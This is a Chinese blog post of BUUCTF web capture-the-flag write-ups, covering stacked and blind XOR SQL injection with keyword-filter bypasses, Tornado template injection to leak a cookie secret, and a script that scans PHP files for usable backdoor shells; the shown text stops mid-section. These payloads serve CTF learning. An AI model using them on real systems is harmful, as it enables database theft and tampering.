<!DOCTYPE html>
<html lang="en">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="Laurel">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Laurel">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content>
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>BUUCTF-WEB · laurel&#39;s note</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/favicon.jpg">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >laurel&#39;s note.</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">BUUCTF-WEB</a>
            </div>
    </div>
    
    <a class="home-link" href=/>laurel's note.</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpeg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            BUUCTF-WEB
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "Web">Web</a>
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "Brush">Brush</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count word-count">3k</span>Reading time: <span class="post-count reading-time">14 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2019/09/06</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <blockquote>
<p>林中有鹿，鹿有孤独。孤独无尽，尽在林中。</p>
</blockquote>
<a id="more"></a>
<hr>
<h3 id="随便注"><a href="#随便注" class="headerlink" title="随便注"></a>随便注</h3><blockquote>
<p>2019 强网杯</p>
</blockquote>
<h4 id="解法一：堆叠注入"><a href="#解法一：堆叠注入" class="headerlink" title="解法一：堆叠注入"></a>解法一：堆叠注入</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?inject=233&apos;;show tables;#</span><br></pre></td></tr></table></figure>

<p>可以看到有两个表~</p>
<p><img src="/img/BUUCTF-WEB/1567737495728.png" alt="1567737495728"></p>
<blockquote>
<p>先介绍一下prepare语法：<br>PREPARE test from ‘我们的sql语句’;//预定义好sql<br>EXECUTE test (如果sql有参数的话, USING xxx,xxx); // (这里USING的只能是会话变量)执行预定义的sql<br>DEALLOCATE PREPARE test;//释放数据库连接</p>
</blockquote>
<p>所以可以构造如下：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?inject=233';<span class="keyword">set</span> @<span class="keyword">sql</span>=<span class="keyword">select</span> * <span class="keyword">from</span> <span class="string">`1919810931114514`</span>;</span><br><span class="line"><span class="keyword">prepare</span> pay <span class="keyword">from</span> @<span class="keyword">sql</span>;</span><br><span class="line"><span class="keyword">execute</span> pay;</span><br></pre></td></tr></table></figure>

<p>页面返回内容为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> preg_match(<span class="string">"/select|update|delete|drop|insert|where|\./i"</span>,$inject);</span><br></pre></td></tr></table></figure>

<p>使用正则匹配过滤了以上关键字，并且大小写绕过是不行滴。那我们可以改成这样：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?inject=233';<span class="keyword">set</span> @<span class="keyword">sql</span>=<span class="keyword">concat</span>(<span class="string">'se'</span>,<span class="string">'lect * from `1919810931114514`'</span>);</span><br><span class="line"><span class="keyword">prepare</span> pay <span class="keyword">from</span> @<span class="keyword">sql</span>;</span><br><span class="line"><span class="keyword">execute</span> pay;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>concat()函数介绍：<br>用于将多个字符串连接成一个字符串。<br>mysql CONCAT(str1,str2,…)<br>返回结果为连接参数产生的字符串。如有任何一个参数为NULL ，则返回值为 NULL。</p>
</blockquote>
<p>页面返回内容为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">strstr($inject, <span class="string">"set"</span>) &amp;&amp; strstr($inject, <span class="string">"prepare"</span>)</span><br></pre></td></tr></table></figure>

<blockquote>
<p>strstr()函数介绍：<br>用于查找字符串的首次出现<br>语法：strstr ( string <code>$haystack</code> , <a href="https://www.php.net/manual/zh/language.pseudo-types.php#language.types.mixed" target="_blank" rel="noopener">mixed</a> <code>$needle</code> [, bool <code>$before_needle</code> = <strong>FALSE</strong> ] ) : string<br>返回 <code>haystack</code> 字符串从 <code>needle</code> 第一次出现的位置开始到 <code>haystack</code> 结尾的字符串。</p>
<p>！该函数区分大小写。如果想要不区分大小写，请使用 <a href="https://www.php.net/manual/zh/function.stristr.php" target="_blank" rel="noopener">stristr()</a>。！</p>
<p>区分大小写的意思是如果是小写的就不能判断出大写的。。。<br>该函数不能区分大小写，所以我们大写即可。<br>它不能区分大小写，所以使用它的时候是区分大小写的。。。<br>所以也就是：该函数区分大小写=该函数不能区分大小写。嗯很有道理。！</p>
</blockquote>
<p>所以对于这个检测，可以直接通过大写绕过：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?inject=233';<span class="keyword">sEt</span> @<span class="keyword">sql</span>=<span class="keyword">concat</span>(<span class="string">'se'</span>,<span class="string">'lect * from `1919810931114514`'</span>);</span><br><span class="line"><span class="keyword">prEpare</span> pay <span class="keyword">from</span> @<span class="keyword">sql</span>;</span><br><span class="line"><span class="keyword">execute</span> pay;</span><br></pre></td></tr></table></figure>

<p>然后就能看到flag啦~</p>
<p><img src="/img/BUUCTF-WEB/1567736159943.png" alt="1567736159943"></p>
<p>此外，还能采用hex编码的形式，在python2中~</p>
<p><img src="/img/BUUCTF-WEB/1567736240567.png" alt="1567736240567"></p>
<p>利用其构造的payload为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?inject=233';<span class="keyword">sEt</span> @<span class="keyword">sql</span>=<span class="number">0x73656c656374202a2066726f6d20603139313938313039333131313435313460</span>;</span><br><span class="line"><span class="keyword">prEpare</span> pay <span class="keyword">from</span> @<span class="keyword">sql</span>;</span><br><span class="line"><span class="keyword">execute</span> pay;</span><br></pre></td></tr></table></figure>

<hr>
<h4 id="解法二："><a href="#解法二：" class="headerlink" title="解法二："></a>解法二：</h4><blockquote>
<p>参考赵师傅的博客：<a href="https://www.zhaoj.in/read-5873.html" target="_blank" rel="noopener">https://www.zhaoj.in/read-5873.html</a></p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?inject=<span class="number">233</span><span class="string">';show columns from `1919810931114514`;#</span></span><br></pre></td></tr></table></figure>

<p><img src="/img/BUUCTF-WEB/1567736840935.png" alt="1567736840935"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?inject=<span class="number">233</span><span class="string">';show columns from words;#</span></span><br></pre></td></tr></table></figure>

<p><img src="/img/BUUCTF-WEB/1567736893848.png" alt="1567736893848"></p>
<p>接下来不太懂，咋就看粗来words表是默认查询的表了鸭…</p>
<p>把191那个表改名为words，把flag列改为id列：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/?inject=<span class="number">233</span><span class="string">';RENAME TABLE `words` TO `words1`;</span></span><br><span class="line"><span class="string">RENAME TABLE `1919810931114514` TO `words`;</span></span><br><span class="line"><span class="string">ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;</span></span><br><span class="line"><span class="string">show columns from words;#</span></span><br></pre></td></tr></table></figure>

<p><img src="/img/BUUCTF-WEB/1567738654654.png" alt="1567738654654"></p>
<p>再访问：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?inject=<span class="number">233</span><span class="string">' or '</span><span class="number">1</span><span class="string">'='</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><img src="/img/BUUCTF-WEB/1567738677680.png" alt="1567738677680"></p>
<p>太神奇了叭…</p>
<hr>
<h3 id="easy-tornado"><a href="#easy-tornado" class="headerlink" title="easy_tornado"></a>easy_tornado</h3><blockquote>
<p>2018 护网杯</p>
</blockquote>
<p>oj上的题做了一点点小改动鸭，三个文件内容如下：</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/flag.txt</span><br><span class="line">flag in /fllllllllllllag</span><br><span class="line"></span><br><span class="line">/welcome.txt</span><br><span class="line">render</span><br><span class="line"></span><br><span class="line">/hints.txt</span><br><span class="line">md5(cookie_secret+md5(filename))</span><br></pre></td></tr></table></figure>

<p>读取文件需要两个参数filename和filehash。其中，filehash=md5(cookie_secret+md5(filename))，但是headers里面并没有cookie值。那就只能谷歌一下tornado render什么的了。解法是在报错页面里模板注入。</p>
<p>通过读取error?msg=可以得到：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'da53eb64-a805-4d4e-bdc2-fda1e66c587e'&#125;</span><br></pre></td></tr></table></figure>

<p>这样cookie_secret就知道了，然后就是计算filehash了，下面提供两种脚本~</p>
<p>PHP代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$str = <span class="string">"/fllllllllllllag"</span>;</span><br><span class="line">$a=md5($str);</span><br><span class="line">$str2 = <span class="string">"da53eb64-a805-4d4e-bdc2-fda1e66c587e"</span>;</span><br><span class="line">$str3=$str2.$a;</span><br><span class="line"><span class="keyword">echo</span> md5($str3);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>python代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">md5</span><span class="params">(s)</span>:</span></span><br><span class="line">	md5 = hashlib.md5() </span><br><span class="line">	md5.update(s) </span><br><span class="line">	<span class="keyword">return</span> md5.hexdigest()</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sol</span><span class="params">()</span>:</span> </span><br><span class="line"> 	filename = <span class="string">'/fllllllllllllag'</span></span><br><span class="line"> 	a =<span class="string">"da53eb64-a805-4d4e-bdc2-fda1e66c587e"</span></span><br><span class="line">	print(md5(a+md5(filename)))</span><br><span class="line"></span><br><span class="line">sol()</span><br></pre></td></tr></table></figure>

<p>跑出来的hash值为 - -</p>
<p><img src="/img/BUUCTF-WEB/1567757429756.png" alt="1567757429756"></p>
<p>利用其访问就行了鸭~</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file?filename=/fllllllllllllag&amp;filehash=75b7a43f3540e10cd317045514812aba</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="高明的黑阔"><a href="#高明的黑阔" class="headerlink" title="高明的黑阔"></a>高明的黑阔</h3><blockquote>
<p>2019 强网杯</p>
</blockquote>
<blockquote>
<p>参考wp：<a href="https://mochazz.github.io/2019/05/27/2019强网杯Web部分题解/#高明的黑客" target="_blank" rel="noopener">https://mochazz.github.io/2019/05/27/2019强网杯Web部分题解/#高明的黑客</a></p>
</blockquote>
<p>这道题也真够猛的！!</p>
<p><img src="/img/BUUCTF-WEB/1567768512837.png" alt="1567768512837"></p>
<p>根据提示下载源码，给了一大堆混乱的文件，需要从这些文件中找能用的shell…</p>
<p>写脚本批量扫描一下类似<code>eval($_GET[x])</code>或<code>system($_GET[x])</code>等shell。</p>
<p>先进入该文件目录，使用PHP7.0以上版本开个端口，作为本地服务器：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php7.3 -S 0.0.0.0:8888</span><br></pre></td></tr></table></figure>

<p><img src="/img/BUUCTF-WEB/1567769481174.png" alt="1567769481174"></p>
<blockquote>
<p>话说这里，<br>-S 127.0.0.0:8000可以正常访问，<br>-S localhost:8000就不能访问，<br>什么鬼嗷😡</p>
</blockquote>
<p>访问localhost:8888，能够看到页面显示正常，就可以开始跑脚本啦 - -</p>
<p><img src="/img/BUUCTF-WEB/1567769555902.png" alt="1567769555902"></p>
<p>直接借用了这个nb师傅的脚本（tqltqltql~）：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os,re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">filenames = os.listdir(<span class="string">'/var/www/html/src'</span>)</span><br><span class="line">pattern = re.compile(<span class="string">r"\$_[GEPOST]&#123;3,4&#125;\[.*\]"</span>)</span><br><span class="line"><span class="keyword">for</span> name <span class="keyword">in</span> filenames:</span><br><span class="line">    print(name)</span><br><span class="line">    <span class="keyword">with</span> open(<span class="string">'/var/www/html/src/'</span>+name,<span class="string">'r'</span>) <span class="keyword">as</span> f:</span><br><span class="line">        data = f.read()</span><br><span class="line">    result = list(set(pattern.findall(data)))</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">for</span> ret <span class="keyword">in</span> result:</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        command = <span class="string">'uname'</span></span><br><span class="line">        flag = <span class="string">'Linux'</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">'GET'</span> <span class="keyword">in</span> ret:</span><br><span class="line">            passwd = re.findall(<span class="string">r"'(.*)'"</span>,ret)[<span class="number">0</span>]</span><br><span class="line">            r = requests.get(url=<span class="string">'http://127.0.0.1:8888/'</span> + name + <span class="string">'?'</span> + passwd + <span class="string">'='</span>+ command)</span><br><span class="line">            <span class="keyword">if</span> flag <span class="keyword">in</span> r.text:</span><br><span class="line">                print(<span class="string">'backdoor file is: '</span> + name)</span><br><span class="line">                print(<span class="string">'GET:  '</span> + passwd)</span><br><span class="line">        <span class="keyword">elif</span> <span class="string">'POST'</span> <span class="keyword">in</span> ret:</span><br><span class="line">            passwd = re.findall(<span class="string">r"'(.*)'"</span>,ret)[<span class="number">0</span>]</span><br><span class="line">            r = requests.post(url=<span class="string">'http://127.0.0.1:8888/'</span> + name,data=&#123;passwd:command&#125;)</span><br><span class="line">            <span class="keyword">if</span> flag <span class="keyword">in</span> r.text:</span><br><span class="line">                print(<span class="string">'backdoor file is: '</span> + name)</span><br><span class="line">                print(<span class="string">'POST:  '</span> + passwd)</span><br><span class="line">    <span class="keyword">except</span> : <span class="keyword">pass</span></span><br></pre></td></tr></table></figure>

<p>确实跑了很久，大概在中间位置能看到成功的shell - -</p>
<p><img src="/img/BUUCTF-WEB/1567769831998.png" alt="1567769831998"></p>
<p>然后利用这个shell，去cat flag叭~</p>
<p><img src="/img/BUUCTF-WEB/1567769890029.png" alt="1567769890029"></p>
<hr>
<h3 id="Hack-World"><a href="#Hack-World" class="headerlink" title="Hack World"></a>Hack World</h3><blockquote>
<p>CISCN2019 华北赛区</p>
</blockquote>
<blockquote>
<p>参考wp：<br><a href="http://www.n0puple.com/index.php/archives/53/#cl-6" target="_blank" rel="noopener">http://www.n0puple.com/index.php/archives/53/#cl-6</a><br><a href="https://southseast.cc/2019/07/19/2019-CISCN-Northern/" target="_blank" rel="noopener">https://southseast.cc/2019/07/19/2019-CISCN-Northern/</a></p>
</blockquote>
<p><img src="/img/BUUCTF-WEB/1567938005681.png" alt="1567938005681"></p>
<p>POST方式提交id值，随便尝试一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">id=1</span><br><span class="line">Hello, glzjin wants a girlfriend.</span><br><span class="line"></span><br><span class="line">id=2</span><br><span class="line">Do you want to be my girlfriend?</span><br><span class="line"></span><br><span class="line">id=0 or id=3++</span><br><span class="line">Error Occured When Fetch Result.</span><br><span class="line"></span><br><span class="line">id=1&apos;</span><br><span class="line">bool(false)</span><br><span class="line"></span><br><span class="line">id=1&apos; (此处有个空格)</span><br><span class="line">SQL Injection Checked.</span><br></pre></td></tr></table></figure>

<p>通过各种尝试，大概过滤了空格，#，-，+，and，or，&amp;，|</p>
<p>可以用异或注入绕过：</p>
<blockquote>
<p>记性不好，忘了异或咋算的了…同为0，异为1：</p>
<p>1^1=0^0=0    1^0=0^1=1</p>
<p>1^0^1=0    1^1^1=1</p>
<p>…</p>
</blockquote>
<p>为了使id=1，可以直接和0异或，只要异或那部分为1就行了鸭。</p>
<p>师傅们的思路是利用了substr函数进行比较，当返回为1时就说明判断正确，从而一位一位地得到flag的值。</p>
<blockquote>
<p>substr函数介绍：</p>
<p>返回字符串的一部分。</p>
<p>substr(string,start,length)</p>
</blockquote>
<p>flag肯定是f开头的，这是判断条件。空格被过滤了，可以用%0a或者()代替，比如以下两个paylaod both 🆗：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1^(substr((select%0aflag%0afrom%0aflag),1,1)&gt;&apos;e&apos;)^1</span><br><span class="line">0^(substr((select(flag)from(flag)),1,1)&gt;&apos;e&apos;)</span><br></pre></td></tr></table></figure>

<p>我先试了一下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">0^(substr((select(flag)from(flag)),0,1)=&apos;f&apos;)</span><br><span class="line">Error Occured When Fetch Result.</span><br><span class="line"></span><br><span class="line">0^(substr((select(flag)from(flag)),1,1)=&apos;f&apos;)</span><br><span class="line">Hello, glzjin wants a girlfriend.</span><br><span class="line"></span><br><span class="line">0^(substr((select(flag)from(flag)),0,1)=&apos;&apos;)</span><br><span class="line">Hello, glzjin wants a girlfriend.</span><br></pre></td></tr></table></figure>

<blockquote>
<p>说明后面两个注入成功了，讲道理为啥是从1开始，不是0才表示第一个字符串开始的吗…没学过PHP的窝一脸懵逼…</p>
</blockquote>
<p>但是还有一点需要注意，flag里面可能是有-号的（实际上也确实有）。但是-号被过滤了，我们可以选择将其转换成ascii码进行输入。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0^(ascii(substr((select(flag)from(flag)),1,1))=&apos;102&apos;)</span><br><span class="line">Hello, glzjin wants a girlfriend.</span><br></pre></td></tr></table></figure>

<blockquote>
<p>话说，感觉在python2中，数字永远比字符串小，不知道这句话对不对…</p>
<blockquote>
<p>&gt;&gt;&gt;9999999999999999&lt;’a’<br>True</p>
